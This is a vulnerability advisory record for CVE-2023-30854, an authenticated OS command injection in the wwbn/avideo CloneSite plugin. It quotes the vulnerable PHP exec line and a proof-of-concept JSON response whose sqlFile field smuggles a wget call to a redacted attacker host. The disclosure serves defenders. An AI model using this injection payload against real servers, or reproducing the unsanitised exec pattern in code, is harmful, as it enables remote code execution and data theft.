CVE-2023-30854 – wwbn/avideo

Package

Manager: composer
Name: wwbn/avideo
Vulnerable Version: >=0 <12.4

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.57628 pctl0.98071

Details

Remote code injection in wwbn/avideo # WWBN Avideo Authenticated RCE - OS Command Injection ## Description An OS Command Injection vulnerability in an Authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. Vulnerable code: ```php $cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}"; $log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file"); exec($cmd . " 2>&1", $output, $return_val); ``` We can control `$objClone->cloneSiteURL` through the admin panel clone site feature. `/plugin/CloneSite/cloneClient.json.php` sends a GET Request to `{$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php`. I hosted a specially crafted `cloneServer.json.php` that prints the following JSON data ```JSON {"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]} ``` Send a GET Request to `/plugin/CloneSite/cloneClient.json.php` then remote code execution is achieved. 

Metadata

Created: 2023-04-27T23:53:45Z
Modified: 2023-04-28T20:05:39Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-6vrj-ph27-qfp3/GHSA-6vrj-ph27-qfp3.json
CWE IDs: ["CWE-78"]
Alternative ID: GHSA-6vrj-ph27-qfp3
Finding: F404
Auto approve: 1